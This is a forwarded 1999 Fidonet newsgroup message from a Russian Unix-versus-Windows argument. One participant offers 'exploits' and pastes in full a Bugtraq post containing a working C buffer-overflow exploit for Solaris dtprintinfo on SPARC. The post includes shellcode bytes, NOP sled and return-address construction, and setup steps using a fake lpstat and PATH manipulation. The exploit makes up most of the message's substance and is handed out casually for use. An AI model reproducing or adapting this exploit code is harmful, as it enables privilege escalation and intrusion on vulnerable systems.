(fwd) Re: "Unix way"

Andrey Gerzhov (kittle@freeland.alex-ua.com)
Sat, 10 Jul 1999 18:53:02 +0300 (EEST)

-- forwarded message --
Path: freeland.alex-ua.com!routki.ki.yurteh.net!carrier.kiev.ua!srcc!Gamma.RU!ddt.demos.su!f400.n5020!f238.n5020!f204.n5020!f1666.n5020!news.simcb.ru!not-for-mail
Newsgroups: fido7.ru.os.cmp
Distribution: fido7
X-Comment-To: xr@anna.npi.msu.su
Approved: gateway@fido7.ru
From: john gladkih <john@gate.simcb.ru>
X-FTN-Sender: john gladkih <john.gladkih@f1666.n5020.z2.fidonet.org>
Date: Thu, 08 Jul 99 18:20:34 +0400
Subject: Re: "Unix way"
Message-ID: <7m2fk2$8v7$2@gate.simcb.ru>
References: <1770583504@gate.simcb.ru> <3784A025.1425A18@anna.npi.msu.su>
Organization: Gates to Hell
X-FTN-AREA: RU.OS.CMP
X-FTN-MSGID: gate.simcb.ru ae8df066
X-FTN-REPLY: anna.npi.msu.su 0d3946ba
X-FTN-REPLYADDR: john@gate.simcb.ru
X-FTN-REPLYTO: 2:5020/1666@fidonet UUCP
NNTP-Posting-Date: 8 Jul 1999 15:20:34 GMT
X-FTN-Tearline: ifmail v.2.14.os-p2
X-FTN-Origin: Gates to Hell (2:5020/1666@fidonet)
X-FTN-SEEN-BY: 50/993 450/102 461/640 462/30 463/68 159 207 464/34 465/110 478/25
X-FTN-SEEN-BY: 4614/1 4615/21 4631/13 4635/4 5000/44 76 5001/15 17 5002/16 5002
X-FTN-SEEN-BY: 5003/15 5004/16 5005/5005 5010/77 148 5011/13 201 5014/4 5015/4
X-FTN-SEEN-BY: 5020/10 37 52 69 79 104 128 169 194 204 238 278 362 400 758 870
X-FTN-SEEN-BY: 5020/1100 1169 1381 1666 1851 1978 5021/11 5023/1 8 11 5025/2
X-FTN-SEEN-BY: 5027/16 5028/51 5029/1 5030/23 115 239 251 818 5033/4 5035/10
X-FTN-SEEN-BY: 5040/47 5042/8 5045/7 5049/256 5050/5050 5051/1 16 5053/16 5055/92
X-FTN-SEEN-BY: 5057/1 5058/24 1000 5059/10 5060/9 5061/15 5063/1 27 5066/18 5068/5
X-FTN-SEEN-BY: 5070/66 5075/10 5077/3 28 5078/20 5080/80 5081/3 5083/13 5085/100
X-FTN-SEEN-BY: 5090/2 5095/4 5099/1 5100/8
X-FTN-PATH: 5020/1666 204 238
X-FTN-PATH: 5020/400
Lines: 117
Xref: freeland.alex-ua.com fido7.ru.os.cmp:18286

xr@anna.npi.msu.su wrote:

>> JG??? так может ли идеология "unix way", заложенная в 70-х годах,
>> JG??? быть адекватной технологиям завтpашнего дня ?
>>
>> jg?? да, да! наше Великое Будующее Windows'2000. какой тут, к черту, уних?!
>>
>> VR? Hаличие ещё более уродливого варианта не является индульгенцией.
>>
>> уродлив - уних. Win'2000 это светлое будующее предложенное нам великой
>> фирмой
>> Microsoft.
>>
>> --
>> John, http://www.t.uz, mailto:idu@ku.ru

xanms> NO COMMENT ;)))

xanms> ------- [START ORIGIN ] ----------
xanms> /***
xanms> Kox by Coolio (coolio@k-r4d.com)

тебе для какого униха иксплоиты нужны?

>From yuuzy@USA.NET Mon May 10 22:21:37 1999
Path: news.simcb.ru!not-for-mail
From: "UNYUN@ShadowPenguin" <yuuzy@USA.NET>
Newsgroups: simcb.netspace.bugtraq
Subject: Re: [Solaris2.6,2.7 dtprintinfo exploits]
Date: 10 May 1999 15:47:37 +0400
Organization: Unknown
Lines: 81
Message-ID: <7h6h0p$hh7$1@gate.simcb.ru>
NNTP-Posting-Host: gate.simcb.ru
X-Trace: gate.simcb.ru 926336857 17960 194.135.97.3 (10 May 1999 11:47:37 GMT)
X-Complaints-To: usenet@simcb.ru
NNTP-Posting-Date: 10 May 1999 11:47:37 GMT
Xref: news.simcb.ru simcb.netspace.bugtraq:155

Sorry, I forgot to to write the following things...

Before execution of dtprintinfo exploit, please make a dummy
lpstat command.

for example,

% cat > lpstat
echo "system for lpprn: server.com"
^D
% chmod 755 lpstat
% setenv PATH .:$PATH
% gcc ex_dtprintinfo.c
% a.out

Following exploit program is for Sparc Solaris.
I tested on Solaris2.6.

/*========================================================================
ex_dtprintinfo.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
=========================================================================
*/
#define ADJUST 0
#define OFFSET 1144
#define STARTADR 724
#define BUFSIZE 900
#define NOP 0xa61cc013
static char x[1000];
unsigned long ret_adr;
int i;
char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
main()
{
putenv("LANG=");
for (i = 0; i < ADJUST; i++) x[i]=0x11;
for (i = ADJUST; i < 900; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx\n",ret_adr);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST; i < 600 ; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE]=0;
execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0);
}

The Shadow Penguin Security
(http://base.oc.to/skyscraper/byte/551)
UNYUN (unewn4th@usa.net)

-- 
John, http://www.t.uz, mailto:idu@ku.ru
-- end of forwarded message --



-- 
С тем, что не помешает никогда,
                                               Kittle